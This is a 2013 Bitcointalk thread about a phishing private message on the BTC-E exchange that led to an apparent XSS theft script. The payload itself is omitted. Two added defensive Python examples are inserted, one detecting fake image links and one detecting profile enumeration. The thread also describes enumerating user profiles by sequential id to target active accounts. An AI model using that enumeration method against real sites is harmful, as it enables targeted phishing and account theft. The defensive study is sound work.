nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:35:36 PM
Hello, today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or the PM system there. It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file. This downloads a script which seems to exploit an XSS vulnerability on BTC-E. (The obfuscated, eval-packed script that the OP pasted here has been omitted.)

According to Blockexplorer, significant amounts of BTC were already stolen: http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
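Added example, not from the thread or from BTC-E: a check in the spirit of the OP's "fetch it with wget on a separate box" approach, deciding whether a link that claims to be a picture really serves an image by looking at the bytes rather than the URL suffix, and flagging the eval(function(...)) unpacker pattern the OP found. The URLs and response bodies are constructed samples.

```python
"""Decide from bytes whether a 'picture' link really serves an image."""
import re
from urllib.parse import urlparse

# Leading bytes of the image formats a 'bitcoin_chart.jpg' link could legitimately serve.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Markers that identify an HTML document near the start of the body.
HTML_RE = re.compile(rb"^\s*(<!doctype\s+html|<html|<script|<body|<iframe)", re.I)
# The packer shape seen in the thread: eval((function(x){...})("..."))
EVAL_RE = re.compile(rb"eval\s*\(\s*\(?\s*function\s*\(", re.I)

def sniff(body: bytes) -> str:
    """Classify a response body by its leading bytes, ignoring the Content-Type header."""
    for magic, kind in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return kind
    if HTML_RE.search(body[:512]):
        return "html"
    return "unknown"

def assess(url: str, content_type: str, body: bytes) -> dict:
    """Compare what the URL and header claim with what the body actually is."""
    ext = urlparse(url).path.rsplit(".", 1)[-1].lower()
    claims_image = ext in ("jpg", "jpeg", "png", "gif")
    kind = sniff(body)
    findings = []
    if claims_image and kind == "html":
        findings.append("url-extension-mismatch: .%s link serves HTML" % ext)
    if content_type.split(";")[0].strip().lower().startswith("image/") and kind == "html":
        findings.append("content-type-mismatch: header says image, body is HTML")
    if kind == "html" and EVAL_RE.search(body):
        findings.append("packed-script: eval(function(...)) unpacker in HTML body")
    return {"kind": kind, "suspicious": bool(findings), "findings": findings}

# Constructed samples (not the real payload): a genuine JPEG header and a fake 'image' that is HTML.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_FAKE = b"<html><body><script>eval((function(x){return x})(\"...\"))</script></body></html>"

if __name__ == "__main__":
    for url, ctype, body in [
        ("http://example.invalid/bitcoin_chart15493.jpg", "image/jpeg", SAMPLE_JPEG),
        ("http://example.invalid/bitcoin_chart15493.jpg", "text/html", SAMPLE_FAKE),
    ]:
        print(url, assess(url, ctype, body))
```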
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:41:57 PM
(could an admin/moderator move this to the proper section please?)
maurits150
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:42:35 PM
I'm also interested in how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
dudeofthestick
Member
Offline
Activity: 78
Merit: 10
April 21, 2013, 06:46:36 PM
What operating system and browser version are you using? With versions, please.
Becher-Karl
Newbie
Offline
Activity: 48
Merit: 0
April 21, 2013, 06:52:09 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:52:58 PM
What operating system and browser version are you using? With versions, please.
Browser? I prefer to use wget on a separate Linux box when someone wants me to click strange links...
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:54:34 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.
optimator
April 21, 2013, 06:58:50 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
Harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess.
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 07:10:45 PM
Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.
bzh
Newbie
Offline
Activity: 34
Merit: 0
April 21, 2013, 07:15:10 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
Harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess.
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
samten
Newbie
Offline
Activity: 14
Merit: 0
April 21, 2013, 07:30:40 PM
don't trust strangers
optimator
April 21, 2013, 07:38:05 PM
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
Bummer! That does lead one to the conclusion that there was inside help...
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 08:10:25 PM
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever. Write a script that goes through all those numbers and have it send PMs. You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.
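Added example, not from the thread or from BTC-E: from the defender's side, the sequential walk over /profile/1, /profile/2, ... that the OP describes leaves an obvious trace in web access logs, and this script flags clients whose requests run through consecutive profile ids. The log lines are constructed samples in Apache common-log format.

```python
"""Flag clients walking /profile/<id> in sequence (profile enumeration)."""
import re
from collections import defaultdict

# Constructed sample log lines (not real BTC-E logs): one client enumerating ids 1..6,
# one client making two unrelated profile views.
LOG_LINES = """\
203.0.113.7 - - [21/Apr/2013:18:01:01 +0000] "GET /profile/1 HTTP/1.1" 200 5120
203.0.113.7 - - [21/Apr/2013:18:01:01 +0000] "GET /profile/2 HTTP/1.1" 200 5133
203.0.113.7 - - [21/Apr/2013:18:01:02 +0000] "GET /profile/3 HTTP/1.1" 200 5098
203.0.113.7 - - [21/Apr/2013:18:01:02 +0000] "GET /profile/4 HTTP/1.1" 200 5101
203.0.113.7 - - [21/Apr/2013:18:01:03 +0000] "GET /profile/5 HTTP/1.1" 200 5110
203.0.113.7 - - [21/Apr/2013:18:01:03 +0000] "GET /profile/6 HTTP/1.1" 200 5102
198.51.100.20 - - [21/Apr/2013:18:01:05 +0000] "GET /profile/4471 HTTP/1.1" 200 5099
198.51.100.20 - - [21/Apr/2013:18:02:40 +0000] "GET /profile/12 HTTP/1.1" 200 5100
""".splitlines()

# Client address and the numeric profile id of a GET /profile/<id> request.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET /profile/(\d+)[ /]')

def enumeration_clients(lines, min_run=5):
    """Return {client_ip: longest run} for clients whose longest run of
    consecutive (id, id+1, id+2, ...) profile requests reaches min_run."""
    ids = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ids[m.group(1)].append(int(m.group(2)))
    flagged = {}
    for ip, seq in ids.items():
        best = run = 1
        for prev, cur in zip(seq, seq[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    for ip, run in enumeration_clients(LOG_LINES).items():
        print("enumeration suspected from %s: %d consecutive profile ids" % (ip, run))
```

The same run-length check applies to any endpoint keyed by a sequential id; the threshold is a tuning knob, since a handful of consecutive views can be innocent.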
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 08:40:09 PM
Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)? I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.